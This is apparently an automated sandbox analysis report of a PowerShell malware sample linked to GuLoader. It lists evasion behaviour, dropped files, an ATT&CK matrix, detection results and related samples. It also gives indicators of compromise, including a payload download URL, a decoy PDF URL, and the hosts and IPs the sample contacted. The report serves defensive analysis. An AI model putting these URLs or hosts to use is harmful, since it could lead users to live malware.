Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\u5p3.batProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Opens the same file many times (likely Sandbox evasion)
Source: C:\Users\Public\u5p3.batFile opened: C:\Users\user\Videos\Tonishly\Unitten\Hyoscyamine.ini count: 49914Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5464Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9782Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\Public\u5p3.batCode function: 2_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_0040595A
Source: C:\Users\Public\u5p3.batCode function: 2_2_0040658F FindFirstFileW,FindClose,2_2_0040658F
Source: C:\Users\Public\u5p3.batCode function: 2_2_00402862 FindFirstFileW,2_2_00402862
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\Public\u5p3.batAPI call chain: ExitProcess graph end nodegraph_2-4938
Source: C:\Users\Public\u5p3.batAPI call chain: ExitProcess graph end nodegraph_2-4935
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: powershell.exe, 00000000.00000002.677020845.000001CFC4FE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\Public\u5p3.batCode function: 2_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,2_2_10001B18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\u5p3.bat "C:\Users\Public\u5p3.bat" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\List of required items and services.pdfJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Users\Public\u5p3.batCode function: 2_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_0040333D

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Native API		11
Registry Run Keys / Startup Folder		1
Access Token Manipulation		121
Masquerading		1
Input Capture		1
Security Software Discovery		Remote Services1
Input Capture		Exfiltration Over Other Network Medium11
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
System Shutdown/Reboot
Default Accounts2
PowerShell		Boot or Logon Initialization Scripts11
Process Injection		121
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop Protocol1
Archive Collected Data		Exfiltration Over Bluetooth1
Ingress Tool Transfer		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)11
Registry Run Keys / Startup Folder		1
Access Token Manipulation		Security Account Manager121
Virtualization/Sandbox Evasion		SMB/Windows Admin Shares1
Clipboard Data		Automated Exfiltration2
Non-Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureScheduled Transfer3
Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
Remote System Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials3
File and Directory Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync13
System Information Discovery		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 process2 2 Behavior Graph ID: 879707 Sample: mx.ps1 Startdate: 01/06/2023 Architecture: WINDOWS Score: 56 6 powershell.exe 17 21 2->6         started        dnsIp3 30 www.bluemaxxlaser.com 203.175.174.69, 49695, 80 SGGS-AS-APSGGSSG Singapore 6->30 32 dld.ae 84.16.234.51, 443, 49694 LEASEWEB-DE-FRA-10DE Germany 6->32 34 www.dld.ae 6->34 22 C:\Users\Public\u5p3.bat, PE32 6->22 dropped 36 Drops PE files to the user root directory 6->36 38 Powershell creates an autostart link 6->38 40 Powershell drops PE file 6->40 11 u5p3.bat 1 42 6->11         started        15 AcroRd32.exe 15 37 6->15         started        17 conhost.exe 6->17         started        file4 signatures5 process6 file7 24 C:\Users\user\AppData\Local\...\System.dll, PE32 11->24 dropped 26 C:\Users\user\AppData\...\SharpDX.DXGI.dll, PE32 11->26 dropped 42 Opens the same file many times (likely Sandbox evasion) 11->42 19 RdrCEF.exe 57 15->19         started        signatures8 process9 dnsIp10 28 192.168.2.1 unknown unknown 19->28

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
mx.ps111%ReversingLabsWin32.Trojan.Generic

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\Public\u5p3.bat3%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Troubleshooting\Egueiite240\SharpDX.DXGI.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsn12E4.tmp\System.dll0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
dld.ae0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.microsoft.co0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
http://www.bludgumaxxlasdgur.com/rh/List%20of%20rdguquirdgud%20itdgums%20and%20sdgurvicdgus.pdf0%Avira URL Cloudsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://www.oruddho.com0%Avira URL Cloudsafe
http://www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf0%Avira URL Cloudsafe
http://www.bluemaxxlaser.com0%Avira URL Cloudsafe
https://www.dld.ae/zp/zpeu.exe0%Avira URL Cloudsafe
http://www.bluemaxxlaser.comx0%Avira URL Cloudsafe
https://www.dld.ae0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
dld.ae
84.16.234.51
truefalseunknown
www.bluemaxxlaser.com
203.175.174.69
truefalse
    		unknown
    www.dld.ae
    		unknown
    		unknownfalse
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://www.dld.ae/zp/zpeu.exefalse
      • Avira URL Cloud: safe
      		unknown
      http://www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdffalse
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.671927237.000001CFBD060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.671927237.000001CFBCF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://www.oruddho.comu5p3.bat, 00000002.00000003.595363835.000000000287C000.00000004.00000020.00020000.00000000.sdmp, bn.txt.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.bludgumaxxlasdgur.com/rh/List%20of%20rdguquirdgud%20itdgums%20and%20sdgurvicdgus.pdfpowershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmp, mx.ps1true
        • Avira URL Cloud: safe
        		unknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmptrue
        • URL Reputation: safe
        		unknown
        https://go.microsoft.copowershell.exe, 00000000.00000002.675724672.000001CFC4F78000.00000004.00000020.00020000.00000000.sdmptrue
        • URL Reputation: safe
        		unknown
        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://go.micropowershell.exe, 00000000.00000002.618817974.000001CFAE98A000.00000004.00000800.00020000.00000000.sdmptrue
          • URL Reputation: safe
          		unknown
          http://www.bluemaxxlaser.compowershell.exe, 00000000.00000002.618817974.000001CFADFE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.618817974.000001CFADFF2000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://contoso.com/powershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.671927237.000001CFBD060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.671927237.000001CFBCF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://contoso.com/Licensepowershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.bluemaxxlaser.comxpowershell.exe, 00000000.00000002.618817974.000001CFADFE0000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://contoso.com/Iconpowershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://nsis.sf.net/NSIS_ErrorErroru5p3.bat, 00000002.00000000.584676802.000000000040A000.00000008.00000001.01000000.0000000A.sdmp, u5p3.bat, 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, u5p3.bat.0.drfalse
              		high
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.618817974.000001CFACEB1000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.618817974.000001CFAD0B8000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://www.dld.aepowershell.exe, 00000000.00000002.618817974.000001CFAD8B7000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  203.175.174.69
                  		www.bluemaxxlaser.comSingapore
                  		24482SGGS-AS-APSGGSSGfalse
                  84.16.234.51
                  		dld.aeGermany
                  		28753LEASEWEB-DE-FRA-10DEfalse

                  Private

                  IP
                  192.168.2.1

                  General Information

                  Joe Sandbox Version:37.1.0 Beryl
                  Analysis ID:879707
                  Start date and time:2023-06-01 12:13:09 +02:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 9m 41s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:5
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample file name:mx.ps1
                  Detection:MAL
                  Classification:mal56.evad.winPS1@13/64@3/3
                  EGA Information:
                  • Successful, ratio: 50%
                  HDC Information:
                  • Successful, ratio: 86.3% (good quality ratio 84.8%)
                  • Quality average: 87.4%
                  • Quality standard deviation: 21.6%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 65
                  • Number of non-executed functions: 32
                  Cookbook Comments:
                  • Found application associated with file extension: .ps1

                  Warnings

                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                  • Excluded IPs from analysis (whitelisted): 2.21.22.155, 2.21.22.179, 23.36.224.131
                  • Excluded domains from analysis (whitelisted): ssl.adobe.com.edgekey.net, armmf.adobe.com, acroipm2.adobe.com.edgesuite.net, e4578.dscb.akamaiedge.net, a122.dscd.akamai.net, ctldl.windowsupdate.com, acroipm2.adobe.com
                  • Execution Graph export aborted for target powershell.exe, PID 6692 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtSetInformationFile calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  12:14:25API Interceptor42x Sleep call for process: powershell.exe modified
                  12:14:40API Interceptor1x Sleep call for process: RdrCEF.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  203.175.174.69zpeu.exeGet hashmaliciousGuLoaderBrowse
                  • bluemaxxlaser.com/rh/rheu.bin
                  as.ps1Get hashmaliciousGuLoaderBrowse
                  • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                  84.16.234.51as.ps1Get hashmaliciousGuLoaderBrowse
                    RFQ - Scan36711006.exeGet hashmaliciousAgentTesla, zgRATBrowse

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      www.bluemaxxlaser.comas.ps1Get hashmaliciousGuLoaderBrowse
                      • 203.175.174.69

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      SGGS-AS-APSGGSSGzpeu.exeGet hashmaliciousGuLoaderBrowse
                      • 203.175.174.69
                      as.ps1Get hashmaliciousGuLoaderBrowse
                      • 203.175.174.69
                      Fe7MaP3DNP.elfGet hashmaliciousMiraiBrowse
                      • 103.14.247.10
                      Demon.x86.elfGet hashmaliciousUnknownBrowse
                      • 103.14.247.55
                      tebjuOp0kK.elfGet hashmaliciousMiraiBrowse
                      • 103.14.247.35
                      7Hhy4dfkst.elfGet hashmaliciousMiraiBrowse
                      • 103.14.247.31
                      5HzazUnnF6.elfGet hashmaliciousMiraiBrowse
                      • 103.14.247.75
                      4M3ACl2k2v.elfGet hashmaliciousUnknownBrowse
                      • 103.14.247.47
                      wget.elfGet hashmaliciousUnknownBrowse
                      • 103.14.247.29
                      chB6z5L2GD.elfGet hashmaliciousMiraiBrowse
                      • 103.14.247.10
                      86iDRbpkXb.elfGet hashmaliciousMiraiBrowse
                      • 103.14.247.72
                      yC34ftIroi.elfGet hashmaliciousMiraiBrowse
                      • 103.14.247.68
                      http://singaporeoptometricassociation.com/Get hashmaliciousUnknownBrowse
                      • 203.175.162.79
                      PiuV0y8Fw8.elfGet hashmaliciousMiraiBrowse
                      • 103.14.247.49
                      BvZi2Dj3LS.elfGet hashmaliciousMiraiBrowse
                      • 103.14.247.26
                      q44S0kQ3wZ.exeGet hashmaliciousAgentTesla, VidarBrowse
                      • 203.175.174.68
                      SecuriteInfo.com.Win32.PWSX-gen.18409.25600.exeGet hashmaliciousAgentTeslaBrowse
                      • 203.175.168.182
                      #U260e#Ufe0f E-Fax-Invoice.htmGet hashmaliciousHTMLPhisherBrowse
                      • 203.175.162.6
                      https://faxcorporation1.od2.vtiger.com/pages/new_fax_receievedGet hashmaliciousHTMLPhisherBrowse
                      • 203.175.162.6
                      aJF1hL1hAJ.dllGet hashmaliciousWannacryBrowse
                      • 124.6.37.129

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      54328bd36c14bd82ddaa0c04b25ed9adas.ps1Get hashmaliciousGuLoaderBrowse
                      • 84.16.234.51
                      file.exeGet hashmaliciousUnknownBrowse
                      • 84.16.234.51
                      file.exeGet hashmaliciousUnknownBrowse
                      • 84.16.234.51
                      Cobro_Juridico_Historial_de_pago.vbsGet hashmaliciousNjrat, PasteDownloaderBrowse
                      • 84.16.234.51
                      PO20230247.xla.xlsxGet hashmaliciousUnknownBrowse
                      • 84.16.234.51
                      file.ps1Get hashmaliciousUnknownBrowse
                      • 84.16.234.51
                      main.ps1Get hashmaliciousKDOT TOKEN GRABBERBrowse
                      • 84.16.234.51
                      AEJR1569.jsGet hashmaliciousNetSupport RATBrowse
                      • 84.16.234.51
                      https://docs.google.com/drawings/d/1yyXXrwkMe93YDIykPC-d3JWZ3X37agPJMgGC3eIiv0w/previewGet hashmaliciousHTMLPhisherBrowse
                      • 84.16.234.51
                      npp.8.5.3.Installer.x64342423423423424242423423424.batGet hashmaliciousUnknownBrowse
                      • 84.16.234.51
                      Pagamento.jsGet hashmaliciousClipboard Hijacker, QuasarBrowse
                      • 84.16.234.51
                      rBillofLading05-25-2023.exeGet hashmaliciousAveMariaBrowse
                      • 84.16.234.51
                      SCAN_DOC_003930_doc.exeGet hashmaliciousUnknownBrowse
                      • 84.16.234.51
                      02705399.exeGet hashmaliciousUnknownBrowse
                      • 84.16.234.51
                      02705399.exeGet hashmaliciousUnknownBrowse
                      • 84.16.234.51
                      HIOY0568.jsGet hashmaliciousUnknownBrowse
                      • 84.16.234.51
                      Voucher_Booking_Reservation_Detail_09888846348.vbsGet hashmaliciousAsyncRATBrowse
                      • 84.16.234.51
                      06472899.jsGet hashmaliciousUnknownBrowse
                      • 84.16.234.51
                      file.jsGet hashmaliciousUnknownBrowse
                      • 84.16.234.51
                      file.jsGet hashmaliciousUnknownBrowse
                      • 84.16.234.51

                      Dropped Files

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Troubleshooting\Egueiite240\SharpDX.DXGI.dllzpeu.exeGet hashmaliciousGuLoaderBrowse
                        zpeu.exeGet hashmaliciousGuLoaderBrowse
                          as.ps1Get hashmaliciousGuLoaderBrowse
                            KwP6qU3cQ8.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              KwP6qU3cQ8.exeGet hashmaliciousGuLoaderBrowse
                                DB948GHBNJI.xlsxGet hashmaliciousGuLoaderBrowse
                                  Order-new world foods.xlsxGet hashmaliciousGuLoaderBrowse
                                    8cAZneRN6B.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      8cAZneRN6B.exeGet hashmaliciousGuLoaderBrowse
                                        fr34veeTGm.exeGet hashmaliciousFormBook, GuLoaderBrowse
